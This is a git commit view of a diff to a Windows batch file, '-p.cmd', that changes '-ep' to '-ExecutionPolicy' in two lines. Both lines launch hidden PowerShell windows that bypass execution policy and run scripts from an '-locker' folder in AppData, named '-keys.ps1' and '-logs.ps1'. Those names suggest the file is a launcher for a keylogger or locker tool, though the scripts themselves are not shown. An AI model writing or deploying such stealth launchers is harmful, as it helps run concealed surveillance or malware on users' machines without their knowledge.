Update -p.cmd
This commit is contained in:
parent
6ac65679cf
commit
ce0263a6c5
1 changed files with 2 additions and 2 deletions
|
@ -1,3 +1,3 @@
|
||||||
@echo off
|
@echo off
|
||||||
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-keys.ps1"
|
powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-keys.ps1"
|
||||||
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-logs.ps1"
|
powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-logs.ps1"
|
||||||
|
|
Loading…
Reference in a new issue